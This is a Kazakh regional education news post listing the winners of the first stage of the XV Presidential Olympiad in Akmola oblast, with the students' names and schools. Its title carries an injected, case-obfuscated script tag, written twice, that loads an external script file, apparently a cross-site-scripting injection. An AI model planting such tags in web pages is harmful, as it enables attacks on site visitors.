XV Президенттік олимпиаданың бірінші (аймақтық) кезеңі туралы ақпарат қорытындысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

18.10.2022

Ақмола облысы білім басқармасының «Ақмола дарыны» дарынды балалар мен талантты жастарды анықтау және қолдау жөніндегі орталығы   2022 жылғы 12 қазанда Степногорск қаласы, № 4 "Болашақ" облыстық мамандандырылған мектеп-лицей-интернатының базасында XV Президенттік олимпиаданың бірінші (аймақтық) кезеңі өткізді. Олимпиадаға бұрын республикалық және халықаралық пәндік олимпиадаларға қатыспаған жаратылыстану-математикалық бағыттағы пәндері бойынша жалпы білім беретін ұйымдардың 11 сынып оқушылары қатысты.

Президенттік олимпиаданың негізгі мақсаттары мен міндеттері:

1) орта білім беру ұйымдарының оқушылары арасында математика, физика, химия және биологиядан дарынды оқушыларды анықтау үшін кәсіптік бағдар мен болашақтағы интеллектуалдық дамуына қолайлы жағдай жасау;

2) жаратылыстану-математикалық бағыттағы пәндерді оқутуда оқушылардың қызығушылығын арттыру, теориялық білімдері мен дағдыларын тереңдету;

3) тұлғаның өзін-өзі жетілдіруіне және дамытуына жағдай жасау.

Президенттік олимпиаданың әрбір қатысушысы барлық кезеңдерде төрт пән бойынша тапсырмаларды орындайды: математика, физика, химия және биология.

Олимпиаданың бірінші (аймақтық) кезеңіне аудандар, Қосшы, Степногорск және Көкшетау, сондай-ақ дарынды балаларға арналған 5 облыстық мамандандырылған мектеп-интернаттар 83 оқушы қатысты.

Бірінші (аймақтық) кезеңінің қорытындысы бойынша І дәрежелі дипломмен марапатталды:

1. Рахимжанов Мансур - Степногорск қаласы, № 4 "Болашақ" облыстық мамандандырылған мектеп-лицей-интернатының 11 сынып оқушысы;

2. Балсеит Елдана - Көкшетау қаласы, Абай атындағы (қазақ тілінде оқытылатын) дарынды балаларға арналған № 3 облыстық мамандандырылған мектеп-интернатының 11 сынып оқушысы;

3. Масная Виктория – Степногорск қаласы, № 4 "Болашақ" облыстық мамандандырылған мектеп-лицей-интернатының 11 сынып оқушысы;

4. Миронов Роман – Степногорск қаласы, № 4 "Болашақ" облыстық мамандандырылған мектеп-лицей-интернатының 11 сынып оқушысы;

ІІ дәрежелі дипломға ие болды:

1. Мухтар Жулдыз – Аршалы ауданы бойынша білім бөлімі Михайловка ауылының жалпы орта білім беретін мектебінің 11 сынып оқушысы;

2. Хамитов Мират – Ақмола облысы білім басқармасының "Білім-инновация" лицей-интернатының 11 сынып оқушысы;

3. Шубаева Аяжан – Көкшетау қаласы бойынша білім бөлімі Көкшетау қаласының № 5 көппрофильді "Таңдау" гимназиясының 11 сынып оқушысы;

4. Абилева Асель - Аршалы ауданы бойынша білім бөлімі Аршалы кентінің Жұмабек Тәшенов атындағы жалпы орта білім беретін мектебінің 11 сынып оқушысы;

5. Сағат Жангир – Степногорск қаласы, № 4 "Болашақ" облыстық мамандандырылған мектеп-лицей-интернатының 11 сынып оқушысы;

6. Тюлебаева Дильназ – Степногорск қаласы, № 4 "Болашақ" облыстық мамандандырылған мектеп-лицей-интернатының 11 сынып оқушысы;

7. Заремба Виолетта – Шортады ауданы бойынша білім бөлімі Шортанды кентінің № 2 жалпы орта білім беретін мектебінің 11 сынып оқушысы;

8. Биданова Арай – Бурабай ауданы бойынша білім бөлімі Щучинск қаласының № 7 мектеп-лицейінің 11 сынып оқушысы;

ІІІ дәрежелі дипломдармен марапатталды:

1. Штанникова Милана – Көкшетау қаласы бойынша білім бөлімі Көкшетау қаласының № 11 мектеп-гимназиясының 11 сынып оқушысы;

2. Абжанова Махаббат – Көкшетау қаласы, Абай атындағы (қазақ тілінде оқытылатын) дарынды балаларға арналған № 3 облыстық мамандандырылған мектеп-интернатының 11 сынып оқушысы;

3. Нурбек Лашын – Ерейментау ауданы бойынша білім бөлімі Еркіншілік ауылының жалпы орта білім беретін мектебінің 11 сынып оқушысы;

4. Адилбекқызы Аружан – Көкшетау қаласы, Абай атындағы (қазақ тілінде оқытылатын) дарынды балаларға арналған № 3 облыстық мамандандырылған мектеп-интернатының 11 сынып оқушысы;

5. Рогова Ксения – Ерейментау ауданы бойынша білім бөлімі Ерейментау қаласының № 1жалпы орта білім беретің мектебінің 11 сынып оқушысы;

6. Кожахметова Айгерим – Жақсы ауданы бойынша білім бөлімі Жақсы ауылының № 1 жалпы орта білім беретін мектебінің 11 сынып оқушысы;

7. Кошель Егор – Сандықтау ауданы бойынша білім бөлімі Лесное ауылының жалпы орта білім беретін мектебінің 11 сынып оқушысы;

8. Жактаева Нұрлым – Целиноград ауданы бойынша білім бөлімі Төңкеріс ауылының жалпы орта білім беретін мектебінің 11 сынып оқушысы;

9. Исасеитова Алина – Атбасар ауданы бойынша білім бөлімі Атбасар қаласының № 7 жалпы орта білім беретін мектебінің 11 сынып оқушысы;

10. Теміржан Мөлдір - Көкшетау қаласы бойынша білім бөлімі Көкшетау қаласының № 19 жалпы орта білім беретін мектебінің 11 сынып оқушысы;

Грамотамен марапатталды:

1. Полянская Вероника – Бурабай ауданы бойынша білім бөлімі Щучинск қаласының № 1 мектеп-гимназиясының 11 сынып оқушысы;

2. Рахат Ділназ – Біржан сал ауданы бойынша білім бөлімі Сәуле ауылының Шәрәпи Әлжанов атындағы жалпы орта білім беретін мектебінің 11 сынып оқушысы;

3. Бегалина Замира – Жарқайың ауданы бойынша білім бөлімі Державин қаласының Надежда Крупская атындағы жалпы орта білім беретін мектебінің 11 сынып оқушысы;

4. Балацко Олеся – Жарқайың ауданы бойынша білім бөлімі Пятигор ауылының жалпы орта білім беретін мектебінің 11 сынып оқушысы.

 Жеңімпаздар мен жүлдегерлерге екінші кезеңде сәттілік пен сәттілік тілейміз!

Просмотров: 320


Пікір қосу



Деректерді қолтаңбаға қосу